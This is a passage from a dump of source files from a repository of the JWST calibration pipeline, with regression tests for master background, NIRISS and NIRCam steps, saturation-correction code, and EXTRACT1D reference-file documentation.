file.\n truth_file = self.get_data(*self.ref_loc,\n 'miri_lrs_sci+bkg_masterbackgroundstep.fits')\n\n result_file = result.meta.filename\n outputs = [(result_file, truth_file)]\n self.compare_outputs(outputs)\n result.close()\n input_sci.close()\n\n\[email protected]\nclass TestMIRIMasterBackgroundMRSDedicated(BaseJWSTTest):\n input_loc = 'miri'\n ref_loc = ['test_masterbackground', 'mrs', 'dedicated', 'truth']\n test_dir = ['test_masterbackground', 'mrs', 'dedicated']\n\n rtol = 0.000001\n\n def test_miri_masterbg_mrs_dedicated(self):\n \"\"\"Run masterbackground step on MIRI MRS association\"\"\"\n asn_file = self.get_data(*self.test_dir,\n 'miri_mrs_mbkg_0304_spec3_asn.json')\n for file in raw_from_asn(asn_file):\n self.get_data(*self.test_dir, file)\n\n collect_pipeline_cfgs('./config')\n result = MasterBackgroundStep.call(\n asn_file,\n config_file='config/master_background.cfg',\n save_background=True,\n save_results=True,\n )\n\n # test 1\n # loop over the background subtracted data and compare to truth files\n # check that the cal_step master_background ran to complete\n for model in result:\n assert model.meta.cal_step.master_background == 'COMPLETE'\n truth_file = self.get_data(*self.ref_loc,\n model.meta.filename)\n outputs = [(model.meta.filename, truth_file)]\n self.compare_outputs(outputs)\n\n # test 2\n # compare the master background combined file to truth file\n master_combined_bkg_file = 'MIRI_MRS_seq1_MIRIFULONG_34LONGexp1_bkg_o002_masterbg.fits'\n truth_background = self.get_data(*self.ref_loc,\n master_combined_bkg_file)\n outputs = [(master_combined_bkg_file, truth_background)]\n self.compare_outputs(outputs)\n\n\[email protected]\nclass TestMIRIMasterBackgroundMRSNodded(BaseJWSTTest):\n input_loc = 'miri'\n ref_loc = ['test_masterbackground', 'mrs', 'nodded', 'truth']\n test_dir = ['test_masterbackground', 'mrs', 'nodded']\n\n rtol = 0.000001\n\n def test_miri_masterbg_mrs_nodded(self):\n \"\"\"Run masterbackground step on MIRI MRS association\"\"\"\n asn_file = self.get_data(*self.test_dir,\n 'miri_mrs_mbkg_spec3_asn.json')\n for file in raw_from_asn(asn_file):\n self.get_data(*self.test_dir, file)\n\n collect_pipeline_cfgs('./config')\n result = MasterBackgroundStep.call(\n asn_file,\n config_file='config/master_background.cfg',\n save_background=True,\n save_results=True,\n )\n\n # test 1\n # loop over the background subtracted data and compare to truth files\n # check that the cal_step master_background ran to complete\n for model in result:\n assert model.meta.cal_step.master_background == 'COMPLETE'\n truth_file = self.get_data(*self.ref_loc,\n model.meta.filename)\n outputs = [(model.meta.filename, truth_file)]\n self.compare_outputs(outputs)\n\n # test 2\n # compare the master background combined file to truth file\n master_combined_bkg_file = 'MIRI_MRS_nod_seq1_MIRIFUSHORT_12SHORTexp1_o001_masterbg.fits'\n truth_background = self.get_data(*self.ref_loc,\n master_combined_bkg_file)\n outputs = [(master_combined_bkg_file, truth_background)]\n self.compare_outputs(outputs)\n\n\[email protected]\nclass TestMIRIMasterBackgroundLRSNodded(BaseJWSTTest):\n input_loc = 'miri'\n ref_loc = ['test_masterbackground', 'lrs', 'nodded', 'truth']\n test_dir = ['test_masterbackground', 'lrs', 'nodded']\n\n rtol = 0.000001\n\n def test_miri_masterbg_lrs_nodded(self):\n \"\"\"Run masterbackground step on MIRI LRS association\"\"\"\n asn_file = self.get_data(*self.test_dir,\n 'miri_lrs_mbkg_nodded_spec3_asn.json')\n for file in raw_from_asn(asn_file):\n self.get_data(*self.test_dir, file)\n\n collect_pipeline_cfgs('./config')\n result = MasterBackgroundStep.call(\n asn_file,\n config_file='config/master_background.cfg',\n save_background=True,\n save_results=True,\n )\n\n # test 1\n # loop over the background subtracted data and compare to truth files\n for model in result:\n assert model.meta.cal_step.master_background == 'COMPLETE'\n truth_file = self.get_data(*self.ref_loc,\n model.meta.filename)\n outputs = [(model.meta.filename, truth_file)]\n self.compare_outputs(outputs)\n\n # test 2\n # compare the master background combined file to truth file\n master_combined_bkg_file = 'MIRI_LRS_nod_seq1_MIRIMAGE_P750Lexp1_o002_masterbg.fits'\n truth_background = self.get_data(*self.ref_loc,\n master_combined_bkg_file)\n outputs = [(master_combined_bkg_file, truth_background)]\n self.compare_outputs(outputs)\n\n\[email protected]\nclass TestMIRIMasterBackgroundLRSDedicated(BaseJWSTTest):\n input_loc = 'miri'\n ref_loc = ['test_masterbackground', 'lrs', 'dedicated', 'truth']\n test_dir = ['test_masterbackground', 'lrs', 'dedicated']\n\n rtol = 0.000001\n\n def test_miri_masterbg_lrs_dedicated(self):\n \"\"\"Run masterbackground step on MIRI LRS association\"\"\"\n asn_file = self.get_data(*self.test_dir,\n 'miri_lrs_mbkg_dedicated_spec3_asn.json')\n for file in raw_from_asn(asn_file):\n self.get_data(*self.test_dir, file)\n\n collect_pipeline_cfgs('./config')\n result = MasterBackgroundStep.call(\n asn_file,\n config_file='config/master_background.cfg',\n save_background=True,\n save_results=True,\n )\n\n # test 1\n # loop over the background subtracted data and compare to truth files\n for model in result:\n assert model.meta.cal_step.master_background == 'COMPLETE'\n truth_file = self.get_data(*self.ref_loc,\n model.meta.filename)\n outputs = [(model.meta.filename, truth_file)]\n self.compare_outputs(outputs)\n\n # test 2\n # compare the master background combined file to truth file\n master_combined_bkg_file = 'MIRI_LRS_seq1_MIRIMAGE_P750Lexp1_o001_masterbg.fits'\n truth_background = self.get_data(*self.ref_loc,\n master_combined_bkg_file)\n outputs = [(master_combined_bkg_file, truth_background)]\n self.compare_outputs(outputs)\n" }, { "alpha_fraction": 0.5786089897155762, "alphanum_fraction": 0.581531286239624, "avg_line_length": 27.516666412353516, "blob_id": "acf768a07856ab6032c4416766ff284c571e1b83", "content_id": "fedab25d71ea177168c8a53958f7233cb68497a6", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1711, "license_type": "permissive", "max_line_length": 69, "num_lines": 60, "path": "/jwst/tests_nightly/general/nircam/test_wfs_combine.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\"\"\"Test wfs_combine\"\"\"\n\nfrom glob import glob\nimport os.path as op\n\nimport pytest\n\nfrom jwst.tests.base_classes import BaseJWSTTest\n\nfrom jwst.associations import load_asn\nfrom jwst.associations.lib.rules_level3_base import format_product\nfrom jwst.pipeline.collect_pipeline_cfgs import collect_pipeline_cfgs\nfrom jwst.stpipe.step import Step\n\n\[email protected]\nclass TestWFSImage3Pipeline(BaseJWSTTest):\n input_loc = 'nircam'\n ref_loc = ['test_wfs_combine', 'truth']\n test_dir = 'test_wfs_combine'\n\n def test_asn_naming(self):\n \"\"\"Test a full run\"\"\"\n\n # Get the data\n collect_pipeline_cfgs('cfgs')\n asn_path = self.get_data(\n self.test_dir, 'wfs_3sets_asn.json'\n )\n with open(asn_path) as fh:\n asn = load_asn(fh)\n for product in asn['products']:\n for member in product['members']:\n self.get_data(\n self.test_dir, member['expname']\n )\n input_files = glob('*')\n\n # Run the step.\n args = [\n op.join('cfgs', 'calwebb_wfs-image3.cfg'),\n asn_path\n ]\n Step.from_cmdline(args)\n\n # Test.\n output_files = glob('*')\n for input_file in input_files:\n output_files.remove(input_file)\n print('output_files = {}'.format(output_files))\n\n for product in asn['products']:\n prod_name = product['name']\n prod_name = format_product(prod_name, suffix='wfscmb')\n prod_name += '.fits'\n assert prod_name in output_files\n output_files.remove(prod_name)\n\n # There should be no more files\n assert len(output_files) == 0\n" }, { "alpha_fraction": 0.6920225620269775, "alphanum_fraction": 0.7114424109458923, "avg_line_length": 47.47265625, "blob_id": "8bf6db226b3d48d3d5a07d7e21918f527ecd94ac", "content_id": "991047663c7eed3528d82dadf8f57a3429accd0f", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 12410, "license_type": "permissive", "max_line_length": 153, "num_lines": 256, "path": "/docs/jwst/references_general/extract1d_reffile.inc", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": ".. _extract1d_reffile:\n\nEXTRACT1D Reference File\n------------------------\nThe EXTRACT1D reference file contains information needed to guide\nthe 1-D extraction process. It is a text file, with the information\nin JSON format.\n\n.. include:: ../references_general/extract1d_selection.inc\n\n.. include:: ../includes/standard_keywords.inc\n\nType Specific Keywords for EXTRACT1D\n++++++++++++++++++++++++++++++++++++\nIn addition to the standard reference file keywords listed above,\nthe following keywords are *required* in EXTRACT1D reference files,\nbecause they are used as CRDS selectors\n(see :ref:`extract1d_selectors`):\n\n========= ==============================\nKeyword Data Model Name\n========= ==============================\nEXP_TYPE model.meta.exposure.type\n========= ==============================\n\nReference File Format\n+++++++++++++++++++++\nEXTRACT1D reference files are text files, with the information stored in\nJSON format.\nAll the information is specified in a list with key ``apertures``. Each\nelement of this list is a dictionary, one for each aperture (e.g. a slit)\nthat is supported by the given reference file. The particular dictionary\nto use is found by matching the slit name in the science data with the\nvalue of key ``id``. Key ``spectral_order`` is optional, but if it is\npresent, it must match the expected spectral order number.\n\nThe following keys are supported for non-IFU data (see below for IFU keys).\nKey ``id`` is the primary criterion for selecting which element of\nthe ``apertures`` list to use. The slit name (except for a full-frame\ninput image) is compared with the values of ``id`` in the ``apertures``\nlist to select the appropriate aperture.\nIn order to allow the possibility of multiple\nspectral orders for the same slit name, there may be more than one element\nof ``apertures`` with the same value for key ``id``. These should then be\ndistinguished by using the secondary selection criterion ``spectral_order``.\nIn this case, the various spectral orders would likely have different\nextraction locations within the image, so different elements of ``apertures``\nare needed in order to specify those locations.\nIf key ``dispaxis`` is specified, its value will be used to set the\ndispersion direction within the image. If ``dispaxis`` is\nnot specified, the dispersion direction will be taken to be the axis\nalong which the wavelengths change more rapidly.\nKey ``region_type`` can be omitted, but if it is specified, its value must\nbe \"target\". The source extraction region can be specified with ``ystart``,\n``ystop``, etc., but a more flexible alternative is to use ``src_coeff``.\nIf background is to be subtracted, this should be specified by giving\n``bkg_coeff``. These are described in more detail below.\n\n* id: the slit name, e.g. \"S200A1\" (string)\n* spectral_order: the spectral order number (optional); this can be either\n positive or negative, but it should not be zero (int)\n* dispaxis: dispersion direction, 1 for X, 2 for Y (int)\n* xstart: first pixel in the horizontal direction, X (int)\n* xstop: last pixel in the horizontal direction, X (int)\n* ystart: first pixel in the vertical direction, Y (int)\n* ystop: last pixel in the vertical direction, Y (int)\n* src_coeff: this takes priority for specifying the source extraction region\n (list of lists of float)\n* bkg_coeff: for specifying background subraction regions\n (list of lists of float)\n* independent_var: \"wavelength\" or \"pixel\" (string)\n* smoothing_length: width of boxcar for smoothing background regions along\n the dispersion direction (odd int)\n* bkg_order: order of polynomial fit to background regions (int)\n* extract_width: number of pixels in cross-dispersion direction (int)\n\nIf ``src_coeff`` is given, those coefficients take priority for specifying\nthe source extraction region in the cross-dispersion direction. ``xstart``\nand ``xstop`` (or ``ystart`` and ``ystop`` if ``dispaxis`` is 2) will\nstill be used for the limits in the dispersion direction. Background\nsubtraction will be done if and only if ``bkg_coeff`` is given. See below\nfor further details.\n\nFor IFU cube data, the following keys are used instead of those above.\nNote that for an extended source, anything specified in a reference file\nor command-line argument will be ignored; the entire image will be\nextracted, and no background subtraction will be done.\n\n* id: the slit name, but this can be \"ANY\" (string)\n* x_center: X pixel coordinate of the target (pixels, float, the default\n is the center of the image along the X axis)\n* y_center: Y pixel coordinate of the target (pixels, float, the default\n is the center of the image along the Y axis)\n* radius: the radius of the circular extraction aperture (pixels, float,\n default is one quarter of the smaller of the image axis lengths)\n* subtract_background: if true, subtract a background determined from an\n annulus with inner and outer radii given by ``inner_bkg`` and\n ``outer_bkg`` (boolean)\n* inner_bkg: of the inner edge of the background annulus (pixels, float,\n default = ``radius``)\n* outer_bkg: of the outer edge of the background annulus (pixels, float,\n default = ``inner_bkg * sqrt(2)``)\n* method: one of \"exact\", \"subpixel\", or \"center\", the method\n used by photutils for computing the overlap between apertures and pixels\n (string, default is \"exact\")\n* subpixels: if ``method`` is \"subpixel\", pixels will be resampled by this\n factor in each dimension (int, the default is 5)\n\nThe rest of this description pertains to the parameters for non-IFU data.\n\nIf ``src_coeff`` is not given, the extraction limits can be specified by\n``xstart``, ``xstop``, ``ystart``, ``ystop``, and ``extract_width``. Note\nthat all of these values are integers, and that the start and stop limits\nare inclusive.\nIf ``dispaxis``\nis 1, the zero-indexed limits in the dispersion direction are ``xstart``\nand ``xstop``; if ``dispaxis`` is 2, the dispersion limits are ``ystart``\nand ``ystop``. (The dispersion limits can be given even if ``src_coeff``\nhas been used for defining the cross-dispersion limits.) The limits in\nthe cross-dispersion direction can be given by ``ystart`` and ``ystop``\n(or ``xstart`` and ``xstop`` if ``dispaxis`` is 2). If ``extract_width``\nis also given, that takes priority over ``ystart`` to ``ystop`` (for\n``dispaxis`` = 1) for the extraction width, but ``ystart`` and ``ystop``\n(for ``dispaxis`` = 1) will still be used to define the middle in the\ncross-dispersion direction. Any of these parameters can be modified\nby the step code if the extraction region would extend outside the input\nimage, or outside the domain specified by the WCS.\n\nThe source extraction region can be specified more precisely by giving\n``src_coeff``, coefficients for polynomial functions for the lower and\nupper limits of the source extraction region. As described in the previous\nparagraph, using this key will override the values\nof ``ystart`` and ``ystop`` (if ``dispaxis`` is 1) or ``xstart`` and\n``xstop`` (if ``dispaxis`` is 2), and ``extract_width``. These polynomials\nare functions of either wavelength (in microns) or pixel number (pixels in\nthe dispersion direction, with respect to the input 2-D slit image),\nspecified by the key ``independent_var``. The default is \"pixel\".\nThe values of these polynomial functions are pixel numbers in the\ndirection perpendicular to dispersion. More than one source extraction\nregion may be specified, though this is not expected to be a typical case.\n\nBackground regions are specified by giving ``bkg_coeff``, coefficients for\npolynomial functions for the lower and upper limits of one or more regions.\nBackground subtraction will be done only if ``bkg_coeff`` is given in the\nreference file. See below for an example. See also ``bkg_order`` below.\n\nThe coefficients are specified as a list of an even number of lists (an\neven number because both the lower and upper limits of each extraction region\nmust be specified). The source extraction coefficients will normally be\na list of just two lists, the coefficients for the lower limit function\nand the coefficients for the upper limit function of one extraction\nregion. The limits could just be constant values,\ne.g. \\[\\[324.5\\], \\[335.5\\]\\]. Straight but tilted lines are linear functions:\n\n\\[\\[324.5, 0.0137\\], \\[335.5, 0.0137\\]\\]\n\nMultiple regions may be specified for either the source or background, or\nboth. It will be common to specify more than one background region. Here\nis an example for specifying two background regions:\n\n\\[\\[315.2, 0.0135\\], \\[320.7, 0.0135\\], \\[341.1, 0.0139\\], \\[346.8, 0.0139\\]\\]\n\nThis is interpreted as follows:\n\n* \\[315.2, 0.0135\\]: lower limit for first background region\n* \\[320.7, 0.0135\\]: upper limit for first background region\n* \\[341.1, 0.0139\\]: lower limit for second background region\n* \\[346.8, 0.0139\\]: upper limit for second background region\n\nIf the dispersion direction is vertical, replace \"lower\" with \"left\" and\n\"upper\" with \"right\" in the above description.\n\nNote especially that ``src_coeff`` and ``bkg_coeff`` contain floating-point\nvalues. For interpreting fractions of a pixel, the convention used here\nis that the pixel number at the center of a pixel is a whole number. Thus,\nif a lower or upper limit is a whole number, that limit splits the pixel\nin two, so the weight for that pixel will be 0.5. To include all the\npixels between 325 and 335 inclusive, for example, the lower and upper\nlimits would be given as 324.5 and 335.5 respectively.\n\nThe order of a polynomial is specified implicitly to be one less than the\nnumber of coefficients (this should not be confused with ``bkg_order``,\ndescribed below). The number of coefficients must be at least one, and\nthere is no predefined upper limit. The various polynomials (lower limits,\nupper limits, possibly multiple regions) do not need to have the same\nnumber of coefficients; each of the inner lists specifies a separate\npolynomial. However, the independent variable (wavelength or pixel)\ndoes need to be the same for all polynomials for a given slit image\n(identified by key ``id``).\n\nThe background is determined independently for each column (or row, if\n``dispaxis`` is 2) of the spectrum. The ``smoothing_length`` parameter\nis the width of a boxcar for smoothing the background in the dispersion\ndirection. If this is not specified, either in the reference file, the\nconfig file, or on the command line, no smoothing will be done along the\ndispersion direction. Following background smoothing (if any), for each\ncolumn (row), a polynomial of order ``bkg_order`` will be fit to the pixel\nvalues in that column (row) in all the background regions. If not\nspecified, a value of 0 will be used, i.e. a constant function, the mean\nvalue. The polynomial will then be evaluated at each pixel within the\nsource extraction region for that column (row), and the fitted values will\nbe subtracted (pixel by pixel) from the source count rate.\n\nExample EXTRACT1D Reference File\n--------------------------------\nThe following JSON was taken as an example from reference file\njwst_niriss_extract1d_0003.json::\n\n {\n \"REFTYPE\": \"EXTRACT1D\",\n \"INSTRUME\": \"NIRISS\",\n \"TELESCOP\": \"JWST\",\n \"DETECTOR\": \"NIS\",\n \"EXP_TYPE\": \"NIS_SOSS\",\n \"PEDIGREE\": \"GROUND\",\n \"DESCRIP\": \"NIRISS SOSS extraction params for ground testing\",\n \"AUTHOR\": \"M.Wolfe, H.Bushouse\",\n \"HISTORY\": \"This reference file is for used in Build 7.1 of the JWST Calibraton pipeline. The regions are rectagular and do not follow the trace.\",\n \"USEAFTER\": \"2015-11-01T00:00:00\",\n \"apertures\": [\n {\n \"id\": \"FULL\",\n \"region_type\": \"target\",\n \"bkg_coeff\": [[2014.5],[2043.5]],\n \"xstart\": 4,\n \"xstop\": 2044,\n \"ystart\": 1792,\n \"ystop\": 1972,\n \"dispaxis\": 1,\n \"extract_width\": 181\n },\n\n {\n \"id\": \"SUBSTRIP256\",\n \"region_type\": \"target\",\n \"bkg_coeff\": [[221.5],[251.5]],\n \"xstart\": 4,\n \"xstop\": 2044,\n \"ystart\": 20,\n \"ystop\": 220,\n \"dispaxis\": 1,\n \"extract_width\": 201\n },\n\n {\n \"id\": \"SUBSTRIP96\",\n \"region_type\": \"target\",\n \"bkg_coeff\": [[1.5],[8.5],[92.5],[94.5]],\n \"xstart\": 4,\n \"xstop\": 2044,\n \"ystart\": 10,\n \"ystop\": 92,\n \"dispaxis\": 1,\n \"extract_width\": 83\n }]\n }\n\n" }, { "alpha_fraction": 0.42064306139945984, "alphanum_fraction": 0.4865861237049103, "avg_line_length": 45.5047607421875, "blob_id": "f750a3deea671d83f3adc52a6948f7439da893c2", "content_id": "848e483c0d79b929487f5f3835eb1ea5c4d8b530", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4883, "license_type": "permissive", "max_line_length": 88, "num_lines": 105, "path": "/jwst/tests_nightly/general/niriss/test_niriss_steps.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom jwst.tests.base_classes import BaseJWSTTestSteps\nfrom jwst.tests.base_classes import pytest_generate_tests # noqa: F401\n\nfrom jwst.ami import AmiAnalyzeStep\nfrom jwst.refpix import RefPixStep\nfrom jwst.dark_current import DarkCurrentStep\nfrom jwst.dq_init import DQInitStep\nfrom jwst.flatfield import FlatFieldStep\nfrom jwst.jump import JumpStep\nfrom jwst.linearity import LinearityStep\nfrom jwst.saturation import SaturationStep\nfrom jwst.pathloss import PathLossStep\n\n\n# Parameterized regression tests for NIRISS processing\n# All tests in this set run with 1 input file and\n# only generate 1 output for comparison.\n#\[email protected]\nclass TestNIRISSSteps(BaseJWSTTestSteps):\n input_loc = 'niriss'\n\n params = {'test_steps':\n [dict(input='ami_analyze_input_16.fits',\n test_dir='test_ami_analyze',\n step_class=AmiAnalyzeStep,\n step_pars=dict(oversample=3, rotation=1.49),\n output_truth=('ami_analyze_ref_output_16.fits',\n dict(rtol = 0.00001)),\n output_hdus=['primary','fit','resid','closure_amp',\n 'closure_pha','fringe_amp','fringe_pha',\n 'pupil_pha','solns'],\n id='ami_analyze_niriss'\n ),\n dict(input='jw00034001001_01101_00001_NIRISS_dq_init.fits',\n test_dir='test_bias_drift',\n step_class=RefPixStep,\n step_pars=dict(odd_even_columns=True,\n use_side_ref_pixels=False,\n side_smoothing_length=10,\n side_gain=1.0),\n output_truth='jw00034001001_01101_00001_NIRISS_bias_drift.fits',\n output_hdus=[],\n id='refpix_niriss'\n ),\n dict(input='jw00034001001_01101_00001_NIRISS_saturation.fits',\n test_dir='test_dark_step',\n step_class=DarkCurrentStep,\n step_pars=dict(),\n output_truth='jw00034001001_01101_00001_NIRISS_dark_current.fits',\n output_hdus=[],\n id='dark_current_niriss'\n ),\n dict(input='jw00034001001_01101_00001_NIRISS_uncal.fits',\n test_dir='test_dq_init',\n step_class=DQInitStep,\n step_pars=dict(),\n output_truth='jw00034001001_01101_00001_NIRISS_dq_init.fits',\n output_hdus=[],\n id='dq_init_niriss'\n ),\n dict(input='jw00034001001_01101_00001_NIRISS_ramp_fit.fits',\n test_dir='test_flat_field',\n step_class=FlatFieldStep,\n step_pars=dict(),\n output_truth='jw00034001001_01101_00001_NIRISS_flat_field.fits',\n output_hdus=[],\n id='flat_field_niriss'\n ),\n dict(input='jw00034001001_01101_00001_NIRISS_linearity.fits',\n test_dir='test_jump',\n step_class=JumpStep,\n step_pars=dict(rejection_threshold=20.0),\n output_truth='jw00034001001_01101_00001_NIRISS_jump.fits',\n output_hdus=[],\n id='jump_niriss'\n ),\n dict(input='jw00034001001_01101_00001_NIRISS_dark_current.fits',\n test_dir='test_linearity',\n step_class=LinearityStep,\n step_pars=dict(),\n output_truth='jw00034001001_01101_00001_NIRISS_linearity.fits',\n output_hdus=[],\n id='linearity_niriss'\n ),\n dict(input='jw00034001001_01101_00001_NIRISS_bias_drift.fits',\n test_dir='test_saturation',\n step_class=SaturationStep,\n step_pars=dict(),\n output_truth='jw00034001001_01101_00001_NIRISS_saturation.fits',\n output_hdus=[],\n id='saturation_niriss'\n ),\n dict(input='soss_2AB_results_int_assign_wcs.fits',\n test_dir='test_pathloss',\n step_class=PathLossStep,\n step_pars=dict(),\n output_truth='soss_2AB_results_int_pathloss.fits',\n output_hdus=[],\n id='pathloss_niriss'\n ),\n ]\n }\n" }, { "alpha_fraction": 0.6200422048568726, "alphanum_fraction": 0.6274261474609375, "avg_line_length": 34.63909912109375, "blob_id": "daa78899fe0b7c57d0992140e26cf84634aa21e4", "content_id": "5a11d01dbab2cba6f56489b32cb24998142adfd3", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4740, "license_type": "permissive", "max_line_length": 83, "num_lines": 133, "path": "/jwst/saturation/saturation.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "#\n# Module for 2d saturation\n#\nimport logging\n\nfrom ..datamodels import dqflags\nfrom ..lib import reffile_utils\nfrom ..lib import pipe_utils\nfrom . import x_irs2\n\nimport numpy as np\n\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.DEBUG)\n\nHUGE_NUM = 100000.\n\ndef do_correction(input_model, ref_model):\n \"\"\"\n Short Summary\n -------------\n Execute all tasks for saturation, including using a saturation reference\n file.\n\n Parameters\n ----------\n input_model: data model object\n The input science data to be corrected\n\n ref_model: data model object\n Saturation reference file mode object\n\n Returns\n -------\n output_model: data model object\n object having GROUPDQ array saturation flags set\n \"\"\"\n\n ramparr = input_model.data\n # Was IRS2 readout used?\n is_irs2_format = pipe_utils.is_irs2(input_model)\n if is_irs2_format:\n irs2_mask = x_irs2.make_mask(input_model)\n\n # Create the output model as a copy of the input\n output_model = input_model.copy()\n groupdq = output_model.groupdq\n\n # Extract subarray from reference file, if necessary\n if reffile_utils.ref_matches_sci(input_model, ref_model):\n satmask = ref_model.data\n dqmask = ref_model.dq\n else:\n log.info('Extracting reference file subarray to match science data')\n ref_sub_model = reffile_utils.get_subarray_model(input_model, ref_model)\n satmask = ref_sub_model.data.copy()\n dqmask = ref_sub_model.dq.copy()\n ref_sub_model.close()\n\n # For pixels flagged in reference file as NO_SAT_CHECK, set the dq mask\n # and saturation mask\n wh_sat = np.bitwise_and(dqmask, dqflags.pixel['NO_SAT_CHECK'])\n dqmask[wh_sat == dqflags.pixel['NO_SAT_CHECK']] = dqflags.pixel['NO_SAT_CHECK']\n satmask[wh_sat == dqflags.pixel['NO_SAT_CHECK']] = HUGE_NUM\n # Correct saturation values for NaNs in the ref file\n correct_for_NaN(satmask, dqmask)\n\n dq_flag = dqflags.group['SATURATED']\n\n nints = ramparr.shape[0]\n ngroups = ramparr.shape[1]\n\n detector = input_model.meta.instrument.detector\n flagarray = np.zeros(ramparr.shape[-2:], dtype=groupdq.dtype)\n for ints in range(nints):\n for plane in range(ngroups):\n # Update the 4D groupdq array with the saturation flag. The\n # flag is set in the current plane and all following planes.\n if is_irs2_format:\n sci_temp = x_irs2.from_irs2(ramparr[ints, plane, :, :],\n irs2_mask, detector)\n flag_temp = np.where(sci_temp >= satmask, dq_flag, 0)\n # Copy flag_temp into flagarray.\n x_irs2.to_irs2(flagarray, flag_temp, irs2_mask, detector)\n else:\n flagarray[:, :] = np.where(ramparr[ints, plane, :, :] >= satmask,\n dq_flag, 0)\n np.bitwise_or(groupdq[ints, plane:, :, :], flagarray,\n groupdq[ints, plane:, :, :])\n\n output_model.groupdq = groupdq\n if is_irs2_format:\n pixeldq_temp = x_irs2.from_irs2(output_model.pixeldq, irs2_mask,\n detector)\n pixeldq_temp = np.bitwise_or(pixeldq_temp, dqmask)\n x_irs2.to_irs2(output_model.pixeldq, pixeldq_temp, irs2_mask, detector)\n else:\n output_model.pixeldq = np.bitwise_or(output_model.pixeldq, dqmask)\n\n return output_model\n\n\ndef correct_for_NaN(satmask, dqmask):\n \"\"\"\n Short Summary\n -------------\n If there are NaNs in the saturation values in the reference file, reset\n them to a very high value such that the comparison never results in a\n positive (saturated) result for the associated pixels in the science data.\n Also reset the associated dqmask values to indicate that, effectively,\n no saturation check will be done for those pixels.\n\n Parameters\n ----------\n satmask: 2-d array\n Subarray of saturation thresholds, from the saturation reference\n file. This may be modified in-place.\n\n dqmask: ndarray, same shape as `satmask`\n The DQ array from the saturation reference file, used to update\n the PIXELDQ array in the output. This may be modified in-place.\n \"\"\"\n # If there are NaNs as the saturation values, update those values\n # to ensure there will not be saturation.\n wh_nan = np.isnan(satmask)\n\n if np.any(wh_nan):\n satmask[wh_nan] = HUGE_NUM\n dqmask[wh_nan] |= dqflags.pixel['NO_SAT_CHECK']\n\n log.info(\"Unflagged pixels having saturation values set to NaN were\"\n \" detected in the ref file; for those affected pixels no\"\n \" saturation check will be made.\")\n" }, { "alpha_fraction": 0.6759656667709351, "alphanum_fraction": 0.677396297454834, "avg_line_length": 30.066667556762695, "blob_id": "af2d16740262b4f665349d89df5ec2096af3581a", "content_id": "4c36bc21b142e5f8779163b4d21e1740ce1eaa27", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1398, "license_type": "permissive", "max_line_length": 86, "num_lines": 45, "path": "/jwst/tests_nightly/general/associations/conftest.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\"\"\"Pytest configurations\"\"\"\nimport pytest\n\nfrom jwst.tests_nightly.general.associations.sdp_pools_source import SDPPoolsSource\n\n\n# Add option to specify a single pool name\ndef pytest_addoption(parser):\n parser.addoption(\n '--sdp-pool', metavar='sdp_pool', default=None,\n help='SDP test pool to run. Specify the name only, not extension or path'\n )\n parser.addoption(\n '--standard-pool', metavar='standard_pool', default=None,\n help='Standard test pool to run. Specify the name only, not extension or path'\n )\n\n\[email protected]\ndef sdp_pool(request):\n \"\"\"Retrieve a specific SDP pool to test\"\"\"\n return request.config.getoption('--sdp-pool')\n\n\[email protected]\ndef standard_pool(request):\n \"\"\"Retrieve a specific standard pool to test\"\"\"\n return request.config.getoption('--standard-pool')\n\n\ndef pytest_generate_tests(metafunc):\n \"\"\"Prefetch and parametrize a set of test pools\"\"\"\n if 'pool_path' in metafunc.fixturenames:\n SDPPoolsSource.inputs_root = metafunc.config.getini('inputs_root')[0]\n SDPPoolsSource.results_root = metafunc.config.getini('results_root')[0]\n SDPPoolsSource.env = metafunc.config.getoption('env')\n\n pools = SDPPoolsSource()\n\n try:\n pool_paths = pools.pool_paths\n except Exception:\n pool_paths = []\n\n metafunc.parametrize('pool_path', pool_paths)\n" }, { "alpha_fraction": 0.6693548560142517, "alphanum_fraction": 0.6709677577018738, "avg_line_length": 27.837209701538086, "blob_id": "88d3b3b193f77613dd0cf241402e3c649bc22570", "content_id": "b6a4fbcebbca12e4b59448ee836a52934d252326", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1240, "license_type": "permissive", "max_line_length": 72, "num_lines": 43, "path": "/jwst/master_background/nirspec_corrections.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import logging\n\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.DEBUG)\n\n\ndef correct_nrs_ifu_bkg(input):\n \"\"\"Apply point source vs. uniform source pathloss adjustments\n to a NIRSpec IFU 2D master background array.\n\n Parameters\n ----------\n input : `~jwst.datamodels.IFUImageModel`\n The input background data.\n\n Returns\n -------\n input : `~jwst.datamodels.IFUIMAGEModel`\n An updated (in place) version of the input with the data\n replaced by the corrected 2D background.\n \"\"\"\n\n log.info('Applying point source pathloss updates to IFU background')\n\n # Try to load the appropriate pathloss correction arrays\n try:\n pl_point = input.getarray_noinit('pathloss_point')\n except AttributeError:\n log.warning('Pathloss_point array not found in input')\n log.warning('Skipping pathloss background updates')\n return input\n\n try:\n pl_uniform = input.getarray_noinit('pathloss_uniform')\n except AttributeError:\n log.warning('Pathloss_uniform array not found in input')\n log.warning('Skipping pathloss background updates')\n return input\n\n # Apply the corrections\n input.data *= (pl_point / pl_uniform)\n\n return input\n" }, { "alpha_fraction": 0.5424731373786926, "alphanum_fraction": 0.6161290407180786, "avg_line_length": 37.35051727294922, "blob_id": "54cc8d6b276725df84e6580629170333ca8c9e3b", "content_id": "6937c9bbf14366e35b9039ea6a03320e46e152f0", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3720, "license_type": "permissive", "max_line_length": 83, "num_lines": 97, "path": 